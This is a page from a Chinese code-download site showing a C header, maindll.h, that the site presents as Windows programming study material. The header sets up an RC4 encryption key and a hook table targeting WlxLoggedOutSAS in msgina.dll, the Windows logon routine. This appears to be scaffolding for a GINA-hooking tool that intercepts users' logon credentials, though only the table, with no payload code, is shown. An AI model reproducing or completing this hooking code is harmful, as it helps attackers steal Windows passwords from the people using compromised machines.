⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 maindll.h

📁 这是一本学习 window编程的很好的参考教材
💻 H
字号:
#include "openssl\rc4.h"
//  Crypto Vars
RC4_KEY global_key;

///////////////////////////////////////////////////////////////////
// HOOK_TABLE
// This table contains:
// - the name of the dll which contains the function you wanna hook
// - the name of the function you wanna hook
// *- the address of the original function
// *- the address of the hook function
// 
// *=Should both be NULL if you edit the table. Their addresses get loaded in
//   the HookFunctionInCurrentProcess (ppOriginal) & InitHooks (ppHook) functions.
//
// Written by JeFFOsZ

#define WLXLOGGEDOUTHOOK 0 // # in htHookTable

struct { 
char *dll; // DLL name
char *func;// Function name
LPVOID ppOriginal;// New address
LPVOID ppHook;// Original address
} htHookTable[]={
	{"msgina.dll","WlxLoggedOutSAS",NULL,NULL},
	{NULL,NULL,NULL,NULL}, // last record dummy
};
///////////////////////////////////////////////////////////////////

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -